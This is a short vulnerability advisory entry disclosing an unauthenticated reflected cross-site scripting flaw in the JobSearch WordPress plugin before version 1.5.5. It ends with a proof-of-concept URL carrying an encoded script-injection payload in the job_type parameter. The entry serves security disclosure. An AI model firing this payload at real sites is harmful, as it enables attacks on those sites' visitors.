JobSearch < 1.5.5 - Unauthenticated Reflected Cross-Site Scripting

2020-07-18T00:00:00
ID WPVDB-ID:10323
Type wpvulndb
Reporter VLΛD VΞCTOR
Modified 2020-07-19T05:02:40

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the JobSearch plugin v1.5.4 for WordPress.

PoC

https://eyecix.com/plugins/jobsearch/?job_type=%3Cimg%20src%3Dx%20onerror%3Dalert%28%60XSS%60%29%3E